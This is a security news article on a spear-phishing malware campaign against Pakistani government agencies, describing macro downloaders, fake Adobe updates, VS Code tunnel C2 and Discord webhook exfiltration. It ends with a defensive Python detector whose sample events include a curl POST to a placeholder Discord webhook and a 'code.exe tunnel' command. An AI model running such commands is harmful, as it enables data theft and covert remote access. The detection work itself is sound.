
New Malware Utilizes Obfuscation and Staged Payloads


New Malware Campaign Targets Government Organizations with Advanced Techniques

A newly identified malware campaign is utilizing sophisticated obfuscation methods and multi-stage payload delivery to circumvent traditional security defenses, according to an extensive analysis conducted by Joe Sandbox. This concerning development signals a new phase in cyber threats, particularly affecting government-affiliated organizations.

The attack initiates with a meticulously crafted spear-phishing email directed at employees of the Punjab Safe Cities Authority (PSCA) and the Pakistan Police Integrated Command, Control, and Communication Center (PPIC3). The email masquerades as communication from an internal consultant and references a credible infrastructure initiative called the “Safe Jail Project,” which heightens the chances of user engagement due to its legitimate appearance. The attackers marked the email with high priority and included a read receipt request to create a sense of urgency and authenticity, thereby encouraging recipients to interact without skepticism.

This attack highlights a troubling trend among threat actors who exploit legitimate services and develop multi-layered infection chains to evade detection. By targeting government-linked institutions specifically, the malware campaign demonstrates a focused approach that could have significant repercussions for national security.

Embedded within the phishing email are two malicious attachments. The first is a Word document named “CAD Reprot.doc,” while the second is a PDF titled “ANPR Reprot.pdf.” The deliberate misspellings in these titles are designed to imitate rushed internal communications, further deceiving unsuspecting employees.

Multi-Stage Infection Chain

Upon execution, the Word document triggers a malicious Visual Basic for Applications (VBA) macro, which only operates once users enable content. Once activated, this macro downloads a payload named “code.exe” from a BunnyCDN-hosted domain, utilizing the IServerXMLHTTPRequest2 object. Notably, this macro employs a technique known as VBA stomping, concealing the malicious code in compiled P-code to evade traditional static analysis tools, making detection increasingly difficult.

In tandem with the Word document, the attached PDF introduces a secondary phase of the attack. It displays a fraudulent Adobe Reader error message prompting users to “Update PDF Reader.” If the user clicks the button, they unwittingly initiate a drive-by download of a malicious ClickOnce application dubbed “Adobe.application,” which subsequently fetches a secondary payload disguised as “Adobe.exe.”

One of the most advanced features of this campaign is its utilization of legitimate platforms for command-and-control (C2) communication. The malware executes “code.exe” with parameters that establish a persistent connection through Microsoft’s Visual Studio Code tunnel service. This clever tactic allows the attackers to maintain remote access while blending malicious traffic with that of trusted infrastructure, further complicating detection efforts.

Additionally, the malware employs Discord webhooks for data exfiltration. Functions embedded in the payload send execution status updates and potentially sensitive information to channels controlled by the attackers on Discord, further complicating efforts to detect unauthorized network activities.

Evasion and Persistence Techniques

The malware is designed with various evasion strategies aimed at avoiding detection and analysis. Key techniques include:

  • Process Enumeration: Using tasklist.exe to detect any active instances or sandbox environments.
  • Unsigned ClickOnce Manifests: Utilizing null public key tokens to bypass trust checks.
  • Typosquatting: Employing misspelled file names and impersonating Adobe branding to mislead users.
  • Automatic Payload Delivery: Leveraging CDN-hosted infrastructure to minimize reliance on suspicious-looking domains.

These methods, combined with the malware’s sophisticated multi-stage delivery, render it highly effective at bypassing conventional antivirus and endpoint detection systems.

Security assessments have assigned the malware sample a malicious score of 100/100, with a confidence level of 95%. This classification is supported by numerous detection engines, including Suricata, Sigma, YARA, and VirusTotal. The confirmed presence of functional macro-based downloaders and active payload execution leaves little room for doubt regarding its malicious nature.

Ultimately, this campaign underscores a significant shift in attacker tactics. By weaponizing legitimate services such as Microsoft VS Code tunnels and Discord, attackers are becoming increasingly adept at evading security measures that rely heavily on domain reputation and signature-based detection methods.

Organizations are strongly urged to disable macros by default, closely monitor unusual usage of developer tools like Visual Studio Code tunnels, and adopt advanced behavioral detection systems to identify signs of suspicious activities across both endpoints and networks. As malware authors continue to innovate and employ trusted platforms, vigilance and proactive security measures become ever more critical in safeguarding sensitive information.
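As an added example (not part of the original article or of Joe Sandbox's analysis), the checker below applies three of the behavioural indicators described above to Sysmon-style process-creation records: an Office application spawning tasklist.exe, the VS Code CLI (code.exe) being started with a tunnel argument, and a Discord webhook URL appearing on a command line. The event records, file paths and command-line flags are constructed sample data, not telemetry from the campaign.

```python
import ntpath
import re
from typing import Dict, List, Tuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Matches the webhook endpoint path used by Discord (discord.com / discordapp.com).
DISCORD_WEBHOOK = re.compile(
    r"https?://(?:[\w.-]+\.)?discord(?:app)?\.com/api/webhooks/", re.I)

# Constructed sample events in Sysmon Event ID 1 style; paths and flags are invented.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Users\u\AppData\Local\Temp\code.exe",
     "CommandLine": "code.exe tunnel --name workstation"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\tasklist.exe",
     "CommandLine": "tasklist.exe /v"},
    {"ParentImage": r"C:\Users\u\AppData\Local\Temp\Adobe.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -X POST https://discord.com/api/webhooks/EXAMPLE_ID/EXAMPLE_TOKEN"},
    {"ParentImage": r"C:\Windows\explorer.exe",   # benign: a normal VS Code launch
     "Image": r"C:\Users\u\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "CommandLine": "Code.exe --new-window"},
]


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of the detection rules this process-creation event matches."""
    hits: List[str] = []
    parent, image = _base(event.get("ParentImage", "")), _base(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    argv = cmd.lower().split()
    # Rule 1: an Office process enumerating running processes (macro sandbox check).
    if parent in OFFICE_APPS and image == "tasklist.exe":
        hits.append("office_spawns_tasklist")
    # Rule 2: the VS Code CLI opening a tunnel; escalate when Office is the parent.
    if image == "code.exe" and "tunnel" in argv:
        hits.append("vscode_tunnel_started")
        if parent in OFFICE_APPS:
            hits.append("vscode_tunnel_from_office")
    # Rule 3: a Discord webhook URL on the command line (possible exfiltration channel).
    if DISCORD_WEBHOOK.search(cmd):
        hits.append("discord_webhook_url")
    return hits


def scan(events) -> List[Tuple[str, str]]:
    """Flatten all matches across a batch of events to (rule, image-name) pairs."""
    return [(rule, _base(e["Image"])) for e in events for rule in classify(e)]


if __name__ == "__main__":
    for rule, image in scan(SAMPLE_EVENTS):
        print(f"{rule:28s} {image}")
```

The same three rules translate directly into Sigma process-creation rules keyed on ParentImage, Image and CommandLine.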
